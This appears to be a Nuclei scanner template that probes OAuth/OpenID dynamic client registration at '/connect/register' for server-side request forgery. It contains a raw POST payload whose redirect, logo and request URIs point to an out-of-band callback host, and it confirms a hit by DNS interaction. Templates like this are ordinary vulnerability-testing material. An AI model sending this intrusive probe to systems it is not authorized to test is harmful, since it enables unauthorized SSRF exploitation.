id: ssrf-via-oauth-misconfig

info:
  name: SSRF due to misconfiguration in OAuth
  author: KabirSuda
  severity: medium
  description: Sends a POST request with the endpoint "/connect/register" to check external Interaction with multiple POST parameters.
  reference:
    - https://portswigger.net/research/hidden-oauth-attack-vectors
  metadata:
    max-request: 1
  tags: misconfig,oast,oauth,ssrf,intrusive

http:
  - raw:
      - |
        POST /connect/register HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/json
        Accept-Language: en-US,en;q=0.9

        {
          "application_type": "web",
          "redirect_uris": ["https://{{interactsh-url}}/callback"],
          "client_name": "{{Hostname}}",
          "logo_uri": "https://{{interactsh-url}}/favicon.ico",
          "subject_type": "pairwise",
          "token_endpoint_auth_method": "client_secret_basic",
          "request_uris": ["https://{{interactsh-url}}"]
        }

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"

# digest: 4a0a0047304502203fcc2073e897e6aa2522f1dc38806fc2724d9858a7aeb6279d37b472ffcbddc30221008922df4d809dfc40f100f7cc349955f6d29a365d06e9f8741d833e27c4b66d69:922c64590222798bb761d5b6d8e72950